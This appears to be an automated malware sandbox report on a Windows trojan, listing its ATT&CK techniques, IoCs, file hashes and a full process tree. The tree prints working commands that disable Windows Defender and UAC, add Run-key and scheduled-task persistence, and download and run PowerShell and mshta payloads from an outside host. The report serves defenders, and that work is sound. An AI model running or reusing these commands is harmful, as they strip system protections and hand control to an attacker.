3a5480d5ea288089567f338055545b05c195f8eaf350ec4698ca6cb03b91f787

Analysis

max time kernel
2s
max time network
65s
platform
windows7_x64
resource
win7v20201028
submitted
25-02-2021 00:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3a5480d5ea288089567f338055545b05c195f8eaf350ec4698ca6cb03b91f787.bin.exe
Size

92KB
MD5

f90879110d316ff87567e5090b32099c
SHA1

849e5fb60e581637288613f694c50df4c71c3692
SHA256

3a5480d5ea288089567f338055545b05c195f8eaf350ec4698ca6cb03b91f787
SHA512

1cb1e57bec68f91a4bf81010d75826bf56d6366547e7950129ea42e2c206dbe09efa1de8f2d3160ca28a5c3a389c1134d73349d2dbe170285443340cf2a91d13

Score

10^/10

evasion persistence trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://hpsj.firewall-gateway.net:80/hpjs.php

Extracted

Language

ps1

Source

URLs

exe.dropper

https://is.gd/NJZZ9I

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe
UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run\#OneDrive1z = "cmd /c powershell -w hidden \"Add-Type -AssemblyName System.Core;IEX (New-Object Net.WebClient).DownloadString('http://hpsj.firewall-gateway.net:80/hpjs.php');\""	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run\#Qyk = "C:\\Users\\Public\\Libraries\\Qyk.exe"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

528 schtasks.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

912 reg.exe

pid	process
528	schtasks.exe

pid	process
912	reg.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

3a5480d5ea288089567f338055545b05c195f8eaf350ec4698ca6cb03b91f787.bin.execmd.exe

description	pid	process	target process
PID 1096 wrote to memory of 2020	1096	3a5480d5ea288089567f338055545b05c195f8eaf350ec4698ca6cb03b91f787.bin.exe	cmd.exe
PID 1096 wrote to memory of 2020	1096	3a5480d5ea288089567f338055545b05c195f8eaf350ec4698ca6cb03b91f787.bin.exe	cmd.exe
PID 1096 wrote to memory of 2020	1096	3a5480d5ea288089567f338055545b05c195f8eaf350ec4698ca6cb03b91f787.bin.exe	cmd.exe
PID 1096 wrote to memory of 2020	1096	3a5480d5ea288089567f338055545b05c195f8eaf350ec4698ca6cb03b91f787.bin.exe	cmd.exe
PID 2020 wrote to memory of 1932	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1932	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1932	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1808	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1808	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1808	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1780	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1780	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1780	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1752	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1752	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1752	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1748	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1748	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1748	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1736	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1736	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1736	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1836	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1836	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1836	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1720	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1720	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1720	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1248	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1248	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1248	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1348	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1348	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1348	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1480	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1480	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1480	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1472	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1472	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1472	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1344	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1344	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1344	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1648	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1648	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1648	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1560	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1560	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1560	2020	cmd.exe	reg.exe
PID 2020 wrote to memory of 1656	2020	cmd.exe	schtasks.exe
PID 2020 wrote to memory of 1656	2020	cmd.exe	schtasks.exe
PID 2020 wrote to memory of 1656	2020	cmd.exe	schtasks.exe
PID 2020 wrote to memory of 1512	2020	cmd.exe	schtasks.exe
PID 2020 wrote to memory of 1512	2020	cmd.exe	schtasks.exe
PID 2020 wrote to memory of 1512	2020	cmd.exe	schtasks.exe
PID 2020 wrote to memory of 1464	2020	cmd.exe	schtasks.exe
PID 2020 wrote to memory of 1464	2020	cmd.exe	schtasks.exe
PID 2020 wrote to memory of 1464	2020	cmd.exe	schtasks.exe
PID 2020 wrote to memory of 1236	2020	cmd.exe	schtasks.exe
PID 2020 wrote to memory of 1236	2020	cmd.exe	schtasks.exe
PID 2020 wrote to memory of 1236	2020	cmd.exe	schtasks.exe
PID 2020 wrote to memory of 532	2020	cmd.exe	schtasks.exe
PID 2020 wrote to memory of 532	2020	cmd.exe	schtasks.exe
PID 2020 wrote to memory of 532	2020	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\3a5480d5ea288089567f338055545b05c195f8eaf350ec4698ca6cb03b91f787.bin.exe
"C:\Users\Admin\AppData\Local\Temp\3a5480d5ea288089567f338055545b05c195f8eaf350ec4698ca6cb03b91f787.bin.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1096

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2F5A.tmp\2F5B.tmp\2F5C.bat C:\Users\Admin\AppData\Local\Temp\3a5480d5ea288089567f338055545b05c195f8eaf350ec4698ca6cb03b91f787.bin.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:2020

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
3⤵
PID:1932

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
3⤵
PID:1808

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
3⤵
PID:1780

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
3⤵
PID:1752

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
3⤵
PID:1748

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
3⤵
PID:1736

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
3⤵
PID:1836

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
3⤵
PID:1720

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
3⤵
PID:1248

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
3⤵
PID:1348

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
3⤵
PID:1480

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
3⤵
PID:1472

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
3⤵
PID:1344

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
3⤵
PID:1648

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
3⤵
PID:1560

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
3⤵
PID:1656

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
3⤵
PID:1512

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
3⤵
PID:1464

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
3⤵
PID:1236

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
3⤵
PID:532

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
3⤵
PID:1124

C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
3⤵
PID:516

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
3⤵
PID:772

C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
3⤵
PID:796

C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
3⤵
PID:1388

C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
3⤵
PID:1672

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:300

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:1292

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:612

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:544

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
3⤵
- Modifies security service
PID:1284

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
3⤵
PID:1764

C:\Windows\system32\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
3⤵
- Modifies registry key
PID:912

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "#OneDrive1z" /t REG_SZ /d "cmd /c powershell -w hidden \"Add-Type -AssemblyName System.Core;IEX (New-Object Net.WebClient).DownloadString('http://hpsj.firewall-gateway.net:80/hpjs.php');\"" /f
3⤵
- Adds Run key to start application
PID:1196

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "#Qyk" /t REG_SZ /d "C:\Users\Public\Libraries\Qyk.exe
3⤵
- Adds Run key to start application
PID:1056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:" -FORCE
3⤵
PID:308

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users" -FORCE
3⤵
PID:1592

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w hidden "Add-Type -AssemblyName System.Core;IEX (New-Object Net.WebClient).DownloadString('http://hpsj.firewall-gateway.net:80/hpjs.php');"
3⤵
PID:432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c Invoke-Command -ScriptBlock { schtasks /create /TN AutomaticChromeUpdaterz /TR 'mshta http://hpsj.firewall-gateway.net:8080/MicrosoftUpdate' /SC minute /mo 60}
3⤵
PID:1088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c Invoke-Command -ScriptBlock { schtasks /create /TN Qyk /TR 'C:\Users\Public\Libraries\Qyk.exe' /SC minute /mo 60}
3⤵
PID:1896

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /TN Qyk /TR C:\Users\Public\Libraries\Qyk.exe /SC minute /mo 60
4⤵
- Creates scheduled task(s)
PID:528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -command "IEX (New-Object Net.WebClient).DownloadFile('https://is.gd/NJZZ9I','C:\Users\Public\Libraries\Qyk.exe');" C:\Users\Public\Libraries\Qyk.exe
3⤵
PID:1484

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Bypass User Account Control

T1088

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_51304672-bf1b-4b76-93d3-bedfdd2e928f
MD5
a70ee38af4bb2b5ed3eeb7cbd1a12fa3

SHA1
81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

SHA256
dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

SHA512
8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_54ab603b-5986-48bf-90b3-a1112b346265
MD5
6f0d509e28be1af95ba237d4f43adab4

SHA1
c665febe79e435843553bee86a6cea731ce6c5e4

SHA256
f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e

SHA512
8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5b03e6c2-c32b-4b9b-bb1a-f5a75890be27
MD5
e5b3ba61c3cf07deda462c9b27eb4166

SHA1
b324dad73048be6e27467315f82b7a5c1438a1f9

SHA256
b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925

SHA512
a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_70104d58-bae1-475e-965c-8acef17148a2
MD5
d89968acfbd0cd60b51df04860d99896

SHA1
b3c29916ccb81ce98f95bbf3aa8a73de16298b29

SHA256
1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

SHA512
b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9c142493-3fa6-47ac-b9da-d5bad49fd83d
MD5
7f79b990cb5ed648f9e583fe35527aa7

SHA1
71b177b48c8bd745ef02c2affad79ca222da7c33

SHA256
080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

SHA512
20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fe1123c1-900b-430f-967b-12c1b568809c
MD5
2d5cd190b5db0620cd62e3cd6ba1dcd3

SHA1
ff4f229f4fbacccdf11d98c04ba756bda80aac7a

SHA256
ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d

SHA512
edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
43eddfbcbf01c138218ca59713a540b5

SHA1
0605b1f38d7b893521e4ae44c871451821882154

SHA256
397fa7feb9429f4463f590aaa7fbe4c5d3d7fa58916c9a4603cc98999665e06b

SHA512
8da7884a1de463ffe79ac652cf2f09c2aeb4b77dc3d4723f0d339df700129c7112e12d8458362060988fe8a27b47f10ce7fc722687748ff66338a70387636ef4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
fb877d24c7df1a4837f0ae35ddc487a7

SHA1
ce75ad707f83e1a47fd3cbc457631a675956c607

SHA256
58efaab24639b64572329ba0a6445d49a5b9d92d58735e12a79c1eaf92eb2508

SHA512
ad1601a708d67459a9097612a8c84d64966fccd6f35a8c7551793c0b6b540fa4df4c0ee8b645dd4e0a95bd7cb2c2a99f09f4e148ea62436911d33979436ff53c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
c5b099d109cdcbffe06256a0babb9439

SHA1
64afa8b0735c50aff814212e2ef17380ee624660

SHA256
0a7f59db02a193a90c5efdb6fedaba3ed41cc9d0a078cd92c4e708de29597dad

SHA512
aa1a63130de1f2878fe86a0e2190c54e2dd9ae882f635223ec78b779b117906d8a9fc525d8751a526c3d2ead0b009035399d7f82947c2347cda7689263182e96

Download Submit
C:\Users\Admin\AppData\Local\Temp\2F5A.tmp\2F5B.tmp\2F5C.bat
MD5
3e332621638a8a5863723c13c5eec977

SHA1
e544ad5f6f62a6f2ade41f007919a1e09ec3af75

SHA256
4fb1c29088ff80ee7febdcc641ba6dade6aa30259bf1b8a22a0edb86d887f1fb

SHA512
5aa87c1e0904e9c33381be8c07723d5c181ecdcce6a1529aa2738b52b205699ee5124a1d15c50021637e272111a5b27a5ca6b52e7c65387b3329688898cc0fb7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
2e41bf0efdf02c806e580dc09943a9b6

SHA1
38a02bf39cdb4773667f52c9d91de09fbcade69d

SHA256
a388876e83b495d3cd061b52bec42776ed7fcd556042cefd13ea1679d97da744

SHA512
caf82e48e82563fa394774eabb701195faf2c422857d02fc82a7287a1cdcd8b98ee1e6100c367a5427042c5b3bdf967ffeecd6d91283eebf3f55763cc59af69d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
2e41bf0efdf02c806e580dc09943a9b6

SHA1
38a02bf39cdb4773667f52c9d91de09fbcade69d

SHA256
a388876e83b495d3cd061b52bec42776ed7fcd556042cefd13ea1679d97da744

SHA512
caf82e48e82563fa394774eabb701195faf2c422857d02fc82a7287a1cdcd8b98ee1e6100c367a5427042c5b3bdf967ffeecd6d91283eebf3f55763cc59af69d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
2e41bf0efdf02c806e580dc09943a9b6

SHA1
38a02bf39cdb4773667f52c9d91de09fbcade69d

SHA256
a388876e83b495d3cd061b52bec42776ed7fcd556042cefd13ea1679d97da744

SHA512
caf82e48e82563fa394774eabb701195faf2c422857d02fc82a7287a1cdcd8b98ee1e6100c367a5427042c5b3bdf967ffeecd6d91283eebf3f55763cc59af69d

Download Submit
memory/300-31-0x0000000000000000-mapping.dmp

Download
memory/308-88-0x00000000027C0000-0x00000000027C1000-memory.dmp

Filesize
4KB

Download
memory/308-82-0x0000000002680000-0x0000000002681000-memory.dmp

Filesize
4KB

Download
memory/308-103-0x00000000028F0000-0x00000000028F1000-memory.dmp

Filesize
4KB

Download
memory/308-91-0x000000001B510000-0x000000001B511000-memory.dmp

Filesize
4KB

Download
memory/308-40-0x0000000000000000-mapping.dmp

Download
memory/308-104-0x0000000002900000-0x0000000002901000-memory.dmp

Filesize
4KB

Download
memory/308-59-0x000007FEF5BA0000-0x000007FEF658C000-memory.dmp

Filesize
9.9MB

Download
memory/308-73-0x0000000002720000-0x0000000002722000-memory.dmp

Filesize
8KB

Download
memory/308-76-0x0000000002724000-0x0000000002726000-memory.dmp

Filesize
8KB

Download
memory/432-56-0x000007FEF5BA0000-0x000007FEF658C000-memory.dmp

Filesize
9.9MB

Download
memory/432-72-0x000000001AC20000-0x000000001AC22000-memory.dmp

Filesize
8KB

Download
memory/432-42-0x0000000000000000-mapping.dmp

Download
memory/516-26-0x0000000000000000-mapping.dmp

Download
memory/528-86-0x0000000000000000-mapping.dmp

Download
memory/532-24-0x0000000000000000-mapping.dmp

Download
memory/544-34-0x0000000000000000-mapping.dmp

Download
memory/612-33-0x0000000000000000-mapping.dmp

Download
memory/772-27-0x0000000000000000-mapping.dmp

Download
memory/796-28-0x0000000000000000-mapping.dmp

Download
memory/912-37-0x0000000000000000-mapping.dmp

Download
memory/1056-39-0x0000000000000000-mapping.dmp

Download
memory/1088-46-0x0000000000000000-mapping.dmp

Download
memory/1096-2-0x00000000761F1000-0x00000000761F3000-memory.dmp

Filesize
8KB

Download
memory/1124-25-0x0000000000000000-mapping.dmp

Download
memory/1196-38-0x0000000000000000-mapping.dmp

Download
memory/1236-23-0x0000000000000000-mapping.dmp

Download
memory/1248-13-0x0000000000000000-mapping.dmp

Download
memory/1284-35-0x0000000000000000-mapping.dmp

Download
memory/1292-32-0x0000000000000000-mapping.dmp

Download
memory/1344-17-0x0000000000000000-mapping.dmp

Download
memory/1348-14-0x0000000000000000-mapping.dmp

Download
memory/1388-29-0x0000000000000000-mapping.dmp

Download
memory/1464-22-0x0000000000000000-mapping.dmp

Download
memory/1472-16-0x0000000000000000-mapping.dmp

Download
memory/1480-15-0x0000000000000000-mapping.dmp

Download
memory/1484-75-0x000000001AD40000-0x000000001AD42000-memory.dmp

Filesize
8KB

Download
memory/1484-71-0x000000001AD44000-0x000000001AD46000-memory.dmp

Filesize
8KB

Download
memory/1484-43-0x0000000000000000-mapping.dmp

Download
memory/1484-57-0x000007FEF5BA0000-0x000007FEF658C000-memory.dmp

Filesize
9.9MB

Download
memory/1484-106-0x000000001B770000-0x000000001B771000-memory.dmp

Filesize
4KB

Download
memory/1512-21-0x0000000000000000-mapping.dmp

Download
memory/1560-19-0x0000000000000000-mapping.dmp

Download
memory/1592-68-0x000000001AC90000-0x000000001AC91000-memory.dmp

Filesize
4KB

Download
memory/1592-74-0x000000001AC10000-0x000000001AC12000-memory.dmp

Filesize
8KB

Download
memory/1592-44-0x000007FEFC121000-0x000007FEFC123000-memory.dmp

Filesize
8KB

Download
memory/1592-41-0x0000000000000000-mapping.dmp

Download
memory/1592-77-0x000000001AC14000-0x000000001AC16000-memory.dmp

Filesize
8KB

Download
memory/1592-51-0x000007FEF5BA0000-0x000007FEF658C000-memory.dmp

Filesize
9.9MB

Download
memory/1648-18-0x0000000000000000-mapping.dmp

Download
memory/1656-20-0x0000000000000000-mapping.dmp

Download
memory/1672-30-0x0000000000000000-mapping.dmp

Download
memory/1720-12-0x0000000000000000-mapping.dmp

Download
memory/1736-10-0x0000000000000000-mapping.dmp

Download
memory/1748-9-0x0000000000000000-mapping.dmp

Download
memory/1752-8-0x0000000000000000-mapping.dmp

Download
memory/1764-36-0x0000000000000000-mapping.dmp

Download
memory/1780-7-0x0000000000000000-mapping.dmp

Download
memory/1808-6-0x0000000000000000-mapping.dmp

Download
memory/1836-11-0x0000000000000000-mapping.dmp

Download
memory/1896-49-0x0000000000000000-mapping.dmp

Download
memory/1896-78-0x00000000020A0000-0x00000000020A1000-memory.dmp

Filesize
4KB

Download
memory/1896-58-0x000007FEF5BA0000-0x000007FEF658C000-memory.dmp

Filesize
9.9MB

Download
memory/1896-69-0x000000001AC54000-0x000000001AC56000-memory.dmp

Filesize
8KB

Download
memory/1896-64-0x000000001AC50000-0x000000001AC52000-memory.dmp

Filesize
8KB

Download
memory/1896-60-0x00000000025C0000-0x00000000025C1000-memory.dmp

Filesize
4KB

Download
memory/1932-5-0x0000000000000000-mapping.dmp

Download
memory/2020-3-0x0000000000000000-mapping.dmp

Download